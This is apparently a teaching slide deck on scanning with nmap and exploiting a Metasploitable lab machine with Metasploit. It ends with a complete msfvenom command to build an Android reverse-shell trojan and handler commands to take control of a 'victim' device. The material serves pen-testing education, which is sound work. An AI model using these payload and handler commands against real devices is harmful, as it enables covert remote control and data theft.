Vulnarability scan with NMAP &

Intrusion attacks with and Metasploit

Montasser Naghmouchi
Plan

* Discovery scans to detect vulnerabilities :

nmap.
* Exploiting Vulnerabilities with Metasploit :
1. exploiting open ftp ports in machines.
2. creating Trojans for android.

2
Reminder : Internet Model (TCP/IP)

Figure 1 : internet model with 4 layers

3
Reminder : Internet Model (TCP/IP)

Figure 2 : Layers and roles of the internet model

4
Reminder : TCP connection

Figure 3 : establishing a TCP connection between PC1 and PC2.

5
Discovery with nmap

* nmap stands for “Network Mapper”, it is an

open source network security tool.
* written in C/C++, nmap has a Scripting Engine
(NSE) capable of scanning networks.
* nmap uses raw IP packets to scan a network in
order to determine hosts, services, operating
systems used by machines in the network,
firewall filters in use.

6
Discovery with nmap

* scan single host using IP address or domain

name : nmap <IP or domain>

* scan a whole network using IP and network

address
nmap <IP>/<numbits of network address>

7
Discovery with nmap

Figure 4 : one host scan.

8
Discovery with nmap

Figure 5 : network scan.

9
Discovery with nmap

Figure 6 : an example
Showing how nmap can
Bypass firewall filters.

10
Discovery with nmap

* use nmap to scan the victim machine.

* victim machine is called “metasploitable” [1]
and is designed for test purposes containing
multiple vulnerabilities and can be attacked.
* determine the IP address of the machine
(different methods) and scan it using multiple
flags like -sV to have the versions of services on
open ports etc, more options in the
documentation [2].

11
Metasploit

* A pen-testing framework, enabling discovery

and exploitation of weaknesses within systems
and machines.
* Contains automated exploitation tools,
listeners to establish connections between
metasploit and exploited systems, command line
tools to create payloads (trojan) in multiple
extensions like .exe, .apk etc.
* metasploit contains a repository of known
weaknesses and exploits, accessible using the
“search” command in msfconsole.

12
Metasploit

Figure 7 : an overview of metasploit functionalities

13
Metasploit + Metasploitable

* Metasploitable is a vulnerable machine created

for test purposes with multiple security
problems ready to be exploited in context of
training or teaching.
* We will scan the machine for weaknesses, and
exploit one of them (vsftp of the open ftp port).
* Use the exploit to :
- see all files on the machine.
- create files / scripts.
- shutdown the machine.

14
Android Trojan with metasploit

* Determine the IP address of your computer

running metasploit. (ip addr show)
* use “msfvenom” to generate a .apk file used
to intrude the android device :
Msfvenom -p android/meterpreter/reverse_tcp LHOST=lhost
LPORT=lport R> filename.apk
Where : -p the payload to use, LHOST your ip to receive the
back connection, LPORT the port where the connection listen
(generally 4444 is used) and R raw format (apk here).
* The .apk file must be installed on the victim android
device.

15
Android Trojan with metasploit

* Configure your metasploit to listen to the

devices running these commands :
1. msfconsole (to open metasploit)
2. use exploit/multi/handler
3. set payload android/meterpreter/reverse_tcp
(the payload used to create the trojan).
4. set lhost <your IP>
5. set lport <the port used : 4444>
6. run (to have a shell and control the device).

16
External links

[1]
https://information.rapid7.com/download-metas
ploitable-2017.html
[2]
https://nmap.org/book/man-host-discovery.html

17